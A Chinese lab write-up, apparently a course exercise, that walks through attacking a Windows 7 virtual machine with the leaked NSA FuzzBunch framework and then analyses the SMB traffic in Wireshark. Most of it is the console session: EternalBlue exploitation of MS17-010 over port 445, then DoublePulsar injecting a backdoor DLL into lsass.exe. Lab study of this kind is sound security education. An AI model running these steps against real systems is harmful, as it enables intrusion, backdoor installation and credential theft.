实验一 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64

IP查询

首先查询靶机和攻击机的IP地址:

靶机:192.168.53.43

实验一 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64

攻击机:192.168.53.86

实验一 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64

运行fb.py文件实施Eternalblue攻击

运行fb.py脚本

实验一 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64

指定攻击目标和log目录

[?] Default Target IP Address [] : 192.168.53.43
[?] Default Callback IP Address [] : 192.168.53.86
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : C:\logs
[*] Checking C:\logs for projects
Index     Project
-----     -------
0         fbtest
1         test
2         testsmb
3         testsmb2
4         testsmb3
5         testsmb4
6         Create a New Project

[?] Project [0] : 6
[?] New Project Name : yuxiaohan
[?] Set target log directory to 'C:\logs\yuxiaohan\z192.168.53.43'? [Yes] : y

[*] Initializing Global State
[+] Set TargetIp => 192.168.53.43
[+] Set CallbackIp => 192.168.53.86

[!] Redirection OFF
[+] Set LogDir => C:\logs\yuxiaohan\z192.168.53.43
[+] Set Project => yuxiaohan

发动Eternalblue攻击

fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.53.43

[*] Applying Session Parameters
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.53.43
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.53.43] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.


[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] :


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.53.43] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.53.43:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              192.168.53.43
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x64 (64-bit)
    [+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 01                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

使用Doublepulsar

fb Special (Eternalblue) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.53.43

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.53.43
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.53.43] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 1
[+] Set Architecture => x64

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] :

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : C:\yuxiaohan.dll
[-] Error: Invalid value for 'DllPayload' (C:\yuxiaohan.dll)

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : C:\backdoor.dll
[+] Set DllPayload => C:\backdoor.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call

[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.53.43] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.53.43:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.53.43
TargetPort            445
DllPayload            C:\backdoor.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x0614A5FC
    SMB Connection string is: Windows 7 Ultimate 7600
    Target OS is: 7 x64
    Target SP is: 0
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

抓包分析

由于wireshark可以抓包的网卡接口要求,因此需要重新改变网络适配,设置成仅主机模式。

Vmnet1用于实现Host-only连接方式,这种方式下,虚拟主机会与真实主机在同一个虚拟私网中。真实主机在这个私网中使用Vmnet1网卡,而非真实的物理网卡,Vmware会有一个虚拟的不可见的交换机连接真实主机和各个使用Host-only方式的虚拟机,这样就组成一个小的虚拟局域网。

重复上述步骤,重新查找并设置攻击机与靶机IP即可

抓包如下:

实验一 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64

追踪TCP流,重组后更易观察:

实验一 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64

第三行给出主机名:T.E.S.T.-.P.C.

第六行给出主机系统及版本:W.i.n.d.o.w.s. .7. .U.l.t.i.m.a.t.e. .7.6.0.0...W.i.n.d.o.w.s. .7. .U.l.t.i.m.a.t.e.

第七行给出工作组名:6...1...W.O.R.K.G.R.O.U.P..

第七行也给出匿名共享管道开启:.@....^.....3....1.9.2...1.6.8...2.3...1.2.9..I.P.C.$...?????.

第十行给出SMB协议版本:.#.SMB2..

上一篇:Transformer计算量和过程统计


下一篇:MongoDB 体系结构与数据模型